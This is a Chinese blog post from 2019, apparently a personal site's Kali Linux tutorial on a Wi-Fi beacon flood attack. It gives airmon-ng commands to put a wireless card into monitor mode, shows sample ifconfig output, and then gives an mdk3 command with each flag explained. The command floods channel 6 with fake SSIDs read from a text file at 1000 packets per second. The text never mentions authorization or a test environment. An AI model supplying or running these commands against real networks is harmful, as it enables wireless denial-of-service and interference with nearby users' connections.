• 我们在哪一颗星上见过 ,以至如此相互思念 ;我们在哪一颗星上相互思念过,以至如此相互深爱
  • 我们在哪一颗星上分别 ,以至如此相互辉映 ;我们在哪一颗星上入睡 ,以至如此唤醒黎明
  • 认识世界 克服困难 洞悉所有 贴近生活 寻找珍爱 感受彼此

kali渗透:无线攻击-mdk3 信标泛滥

Kali 成长 云涯 5年前 (2019-04-25) 2269次浏览 0个评论

背景知识

MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能,可以说是WiFi攻击中比较实用的一款工具。

开始实施

首先我们先开启网卡监听模式:

airmon-ng start wlan0   打开监听模式

airmon-ng stop wlan0mon 关闭监听模式,关闭之后就变回wlan0

然后我们输入ifconfig查看网卡是否开启了监听模式,即查看网卡名后是否增加了mon。

root@kali-linux:~# ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 60-57-18-BD-94-99-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 59  bytes 6198 (6.0 KiB)
        RX errors 0  dropped 59  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

这里可以看到我们的网卡已经开启监听模式了

然后我们就要先在一个文本罗列出一个垃圾WiFi的名称

我们在根目录下写入一个文本:

leafpad wifiname

【leafpad 是一款linux下的轻量级编辑器。类似于windows下的notepad(记事本)】

在wifiname下写入WiFi的名称,要注意换行。

mdk3 wlan0mon b -c 6 -s 1000 -f ./wifinam
//wlan0mon  -->开启监听模式的无线网卡名称
//b         -->mdk3工具B型攻击
//-c 6    -->向信频6发送大量SSID
//-s 1000    -->向这个信频每秒广播1000个数据
//-f ./wifiname     -->自定义WiFi名称(即SSID)文件路径

之后就可以等待wifi的出现了!


云涯历险记 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:kali渗透:无线攻击-mdk3 信标泛滥
喜欢 (8)

您必须 登录 才能发表评论!